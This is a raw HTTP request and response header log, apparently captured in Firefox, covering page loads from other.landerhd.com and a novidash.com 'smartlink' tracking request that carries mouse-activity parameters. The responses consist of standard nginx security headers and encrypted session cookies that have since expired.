date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6InRzblNVVWV0cFBURlA5MVJBL1ZBTXc9PSIsInZhbHVlIjoiVWF3cnYyVlBmVEcyMTdzZmhhcHlxM1dyOW1IdWdqNjZady9QZDAwcmN4TnlxbnZpY2tobk0vNlJrQlZ4TWJYaVFZUTZyR05WOXhMekxCM0JjS3dFUkhRMHZ0SGtyT3hwWnBPcHpveTNTMjFQdkJnUUNVK1dMUDNDNVlCS21uWGgiLCJtYWMiOiI0NDBjNGJiMzQxYTc1MTFmYjdmZDY0NmFjZWZmNTM3NmExM2EyOTBjZjA5OTJiZDMxZmFiNTI5NGNiNDgwZGYyIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6ImlCOHRGMzBwanM0UDlmSGcvSEdkTlE9PSIsInZhbHVlIjoiSHNjRDkwZ2EwcDFmdXA3cEdxNGRiQVVJajFNdy9vcTZSRWcxLzg2NWtSc3EyT0VHdkxUeUFKVERSY0wrVE5vbkt1OXZnSG5PN3oxcEpIejFGQWkzZUNIZzZiK3piT1VpS3laVmhGV3hxejh4b0UwUnAzcEUzZ01LNkxhZHVBVjYiLCJtYWMiOiJmMDZlYTM5OWYzNjE2NmJiM2UzZDE0MzQ2ZmI3YjFlNDI0ZWZhNzJjYzEzNDNmNTk0YjMzNjk5YzAzZmIxYjg4IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /899637196 HTTP/1.1
Host: other.landerhd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /smartlink-css/6312c212994913464d155879?sop=2&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1
Host: novidash.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:17 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjBjQk1reVRScFVISDJObit3dStZN3c9PSIsInZhbHVlIjoiaFE5T1dXbFBydXBMaThwajkrK3U2WWJnWEtsd2cwVWw0QSt1eEVEemt6TmZWbU1YYVBjRXVCUDdqendqc3VCQ2lldVVsQjMxVzhUVk56OWp4aGdPYzh4WjdqWHBzZ3FnWkNnYVVhWjJMZklGcGxBMU5yM0Y5Vkl4Y2VhNUNQT1YiLCJtYWMiOiJkMWJiMDdmNzFlMjc2Nzg2YWYxOTI4ODNkZTdmNmQ4ZDk1NDg5YTU1YjgwNmE1ZGM3NGU2MzI5NjFjOTkxN2U5IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:17 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlpaUmVTcUp2OFNlMFV3UElTRnFRTkE9PSIsInZhbHVlIjoic2xLYjBzOXVYaVRNYXFzVEVnM0hROWRmRTlTRmV0TjgxTkZkTUxtcHR5Rm0xaWRVcXAxYm0rSiswNU8yeGhaeURENURNOTVxVXpIei9pL2U3WnBQc1NBZGJWR1g1ODM2Z1cyOXhjdEh2eGR6U3E2c3lhMnR6ckFYYjBjUHJVSzgiLCJtYWMiOiIyNWM4MGRlMjFhZGVlZjM5OWZmMTY4ZjczMWRkZjBmODJkMGFjZGJlYTc3MTFmMTFiZGE5N2FhNTUzZDU5MzdhIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:17 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---